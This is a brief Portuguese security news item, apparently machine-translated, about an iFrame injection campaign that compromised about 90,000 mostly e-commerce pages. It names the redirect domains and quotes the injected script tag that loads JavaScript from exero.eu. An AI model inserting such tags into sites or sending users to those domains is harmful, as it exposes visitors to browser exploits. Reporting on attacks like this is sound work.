• Cerca de 90000 Páginas Comprometidas por Injeção de iFrame

    Depois de um árduo trabalho de análise, os pesquisadores da empresa de segurança Armorize descobriram um ataque de injeção de iFrame maciça, que tem comprometido cerca de 90000 páginas Web, pertencentes principalmente aos sites de comércio eletrônico.

    Os pontos injetados com iFrame para o domínio
    willysy.com e através de uma série de redirecionamentos e cargas JavaScript de iFrames adicionais, leva o usuário para uma página de um domínioarhyv.ru . Dessa forma, uma uma série de façanhas tentar tirar vantagem de várias de vulnerabilidades no navegador do usuário.

    Os pesquisadores afirmam que a infecção resulta de u'a mal sucedida tentativa no iFrame injetado, sendo processado como conteúdo, ao invés do executado, na parte do título do site. De acordo com eles, a injeção inicial de iFrame mais tarde foi substituída com o código:

    <script src=http://exero.eu/catalog/jquery.js></script>

    Saiba Mais:

    [1] Net-Security: http://www.net-security.org/secworld.php?id=11350

Visite: BR-Linux ·  VivaOLinux ·  Dicas-L